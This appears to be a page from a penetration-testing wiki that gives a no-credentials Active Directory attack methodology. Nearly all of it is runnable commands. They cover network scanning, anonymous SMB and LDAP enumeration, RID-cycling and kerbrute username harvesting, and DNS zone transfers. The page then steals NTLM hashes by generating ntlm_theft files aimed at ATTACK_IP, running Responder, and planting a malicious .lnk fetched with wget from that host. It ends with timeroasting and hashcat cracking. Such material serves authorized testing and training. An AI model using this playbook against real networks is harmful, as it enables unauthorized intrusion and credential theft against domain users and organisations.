No Credentials

1) Do reconnaissance for live hosts within a network

Scan an IP range

nxc smb IP_RANGE

Scan all TCP ports of a machine

sudo rustscan -a IP -r 1-65535 -- -A -Pn -oA

Scan UDP ports

sudo nmap -sU --top-ports 100 -vvv IP -oA

Analyze the scan output. If we find a domain, make an entry in the hosts file

sudo nano /etc/hosts
IP  domain.local

If SMB is signed but not enabled, or neither, check if you can do relay attacks.

2) Do reconnaissance for credentials (users and passwords)

SMB

Check SMB information for null session and guest access, as well as general information about the machine

enum4linux-ng IP

Check for null session and/or guest access for SMB share access

nxc smb domain.local -u '' -p '' --shares
nxc smb domain.local -u guest -p '' --shares

TIP: Guest might have access where null has not!

Dump all valid users in the domain via RID cycling

nxc smb domain.local -u '' -p '' --rid-brute > users.txt

Parse results

grep "SidTypeUser" users.txt | cut -d '\' -f2 | cut -d ' ' -f1 > newusers.txt

Kerberos

If we find a list of usernames, check if these usernames are valid

kerbrute userenum -d domain.local --dc dc.domain.local users.txt

If we have no hints for finding a username list, we can enumerate using a specific wordlist

kerbrute userenum -d domain.local --dc dc.domain.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute userenum -d domain.local --dc dc.domain.local /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt

LDAP

Enumerate the domain via LDAP

ldapsearch -v -x -b "DC=domain,DC=local" -H "ldap://DC_IP" "(objectclass=*)"

Enumerate users

nxc ldap domain.local -u '' -p '' --users

Enumerate user descriptions (check for sensitive information like passwords, etc.)

nxc ldap <hostname> -u '' -p '' -M get-desc-users

HTTP

Enumerate directories

feroxbuster --url http://domain.local -w /usr/share/wordlists/dirb/common.txt -C 404,500,400,403

Enumerate subdomains

ffuf -u http://domain.local -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.domain.local'

DNS

Do a DNS Zone transfer

dig axfr @DNS_IP
dig axfr @DNS_IP domain.local

3) NTLM Hash Stealing

Generate a malicious payload

python3 ntlm_theft.py -g all -s ATTACK_IP -f FOLDER_NAME

Activate responder

sudo responder -I INTERFACE

Upload a .lnk file or any other file generated by ntlm_theft, depending on use case on an SMB share, or inside the machine

put malicious.lnk
wget http://ATTACK_IP/malicious.lnk -O C:\target\malicious.lnk

Check Responder after a few minutes, then crack the NTLMv2 hash

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlist/rockyou.txt

4) Timeroasting

Do a timeroasting attack to extract hashes from machine accounts

sudo python3 timeroast.py DC_IP | tee ntp-hashes.txt

Crack hashes

hashcat -a 0 -m 31300 ntp-hashes.txt /usr/share/wordlist.txt

PreviousActive Directory General Methodology NextOne Credential Only

Last updated 21 days ago

hashtag1) Do reconnaissance for live hosts within a network

hashtag2) Do reconnaissance for credentials (users and passwords)

hashtagSMB

hashtagTIP: Guest might have access where null has not!

hashtagKerberos

hashtagLDAP

hashtagHTTP

hashtagDNS

hashtag3) NTLM Hash Stealing

hashtag4) Timeroasting